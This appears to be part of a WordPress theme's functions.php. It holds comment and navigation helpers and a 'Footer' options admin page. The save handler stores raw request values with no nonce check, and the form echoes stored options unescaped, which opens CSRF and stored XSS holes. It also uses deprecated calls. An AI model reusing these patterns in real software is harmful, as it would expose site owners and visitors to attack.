if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Save changes" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
